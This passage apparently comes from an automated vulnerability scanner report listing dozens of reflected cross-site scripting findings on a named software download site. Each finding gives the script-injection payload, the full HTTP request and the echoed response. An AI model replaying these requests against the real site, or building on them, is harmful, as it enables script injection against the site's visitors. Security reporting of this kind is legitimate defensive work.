The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bbf"><script>alert(1)</script>75abb52cf6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html?e6bbf"><script>alert(1)</script>75abb52cf6c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59999


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html?e6bbf"><script>alert(1)</script>75abb52cf6c=1"/>
...[SNIP]...

4.1725. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8bd"><script>alert(1)</script>2073222b13b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsfe8bd"><script>alert(1)</script>2073222b13b/t-64-bit-easytether-x64-download-byhsbuvf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:24:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsfe8bd"><script>alert(1)</script>2073222b13b/t-64-bit-easytether-x64-download-byhsbuvf.html" />
...[SNIP]...

4.1726. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d668a"><script>alert(1)</script>fda2f2d8370 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.htmld668a"><script>alert(1)</script>fda2f2d8370 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53923


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-easytether-x64-download-byhsbuvf.htmld668a"><script>alert(1)</script>fda2f2d8370"/>
...[SNIP]...

4.1727. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b318"><script>alert(1)</script>59af2c6b207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html?2b318"><script>alert(1)</script>59af2c6b207=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:16 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html?2b318"><script>alert(1)</script>59af2c6b207=1"/>
...[SNIP]...

4.1728. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6632"><script>alert(1)</script>c0725bae4aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsd6632"><script>alert(1)</script>c0725bae4aa/t-64-bit-messenger-plus-live-download-upxgwatv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:22:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsd6632"><script>alert(1)</script>c0725bae4aa/t-64-bit-messenger-plus-live-download-upxgwatv.html" />
...[SNIP]...

4.1729. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 583a5"><script>alert(1)</script>95c1c196d99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html583a5"><script>alert(1)</script>95c1c196d99 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html583a5"><script>alert(1)</script>95c1c196d99"/>
...[SNIP]...

4.1730. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978a2"><script>alert(1)</script>f39f418527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html?978a2"><script>alert(1)</script>f39f418527=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60099


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html?978a2"><script>alert(1)</script>f39f418527=1"/>
...[SNIP]...

4.1731. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e02"><script>alert(1)</script>f78bbafec09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads87e02"><script>alert(1)</script>f78bbafec09/t-64-bit-news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads87e02"><script>alert(1)</script>f78bbafec09/t-64-bit-news-file-grabber-download-stclytop.html" />
...[SNIP]...

4.1732. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6727"><script>alert(1)</script>351fce78751 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.htmlc6727"><script>alert(1)</script>351fce78751 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55692


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-news-file-grabber-download-stclytop.htmlc6727"><script>alert(1)</script>351fce78751"/>
...[SNIP]...

4.1733. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70863"><script>alert(1)</script>1a306d3759b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.html?70863"><script>alert(1)</script>1a306d3759b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55698


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-news-file-grabber-download-stclytop.html?70863"><script>alert(1)</script>1a306d3759b=1"/>
...[SNIP]...

4.1734. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 479d7"><script>alert(1)</script>109565655ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads479d7"><script>alert(1)</script>109565655ac/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads479d7"><script>alert(1)</script>109565655ac/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html" />
...[SNIP]...

4.1735. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2edda"><script>alert(1)</script>53ca7435637 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html2edda"><script>alert(1)</script>53ca7435637 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html2edda"><script>alert(1)</script>53ca7435637"/>
...[SNIP]...

4.1736. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a540c"><script>alert(1)</script>1b11e322301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html?a540c"><script>alert(1)</script>1b11e322301=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html?a540c"><script>alert(1)</script>1b11e322301=1"/>
...[SNIP]...

4.1737. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aaf8"><script>alert(1)</script>29f62c52533 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads2aaf8"><script>alert(1)</script>29f62c52533/t-64-bit-nokia-ovi-suite-download-bhfheplp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads2aaf8"><script>alert(1)</script>29f62c52533/t-64-bit-nokia-ovi-suite-download-bhfheplp.html" />
...[SNIP]...

4.1738. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef19c"><script>alert(1)</script>53099d9c0ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.htmlef19c"><script>alert(1)</script>53099d9c0ac HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.htmlef19c"><script>alert(1)</script>53099d9c0ac"/>
...[SNIP]...

4.1739. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5920"><script>alert(1)</script>1d30e1ca09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html?b5920"><script>alert(1)</script>1d30e1ca09f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html?b5920"><script>alert(1)</script>1d30e1ca09f=1"/>
...[SNIP]...

4.1740. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb7c1"><script>alert(1)</script>cb83eacf673 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadseb7c1"><script>alert(1)</script>cb83eacf673/t-64-bit-nokia-pc-suite-download-psjkkdil.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:20:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadseb7c1"><script>alert(1)</script>cb83eacf673/t-64-bit-nokia-pc-suite-download-psjkkdil.html" />
...[SNIP]...

4.1741. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f68"><script>alert(1)</script>c04ad26948f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.htmld8f68"><script>alert(1)</script>c04ad26948f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
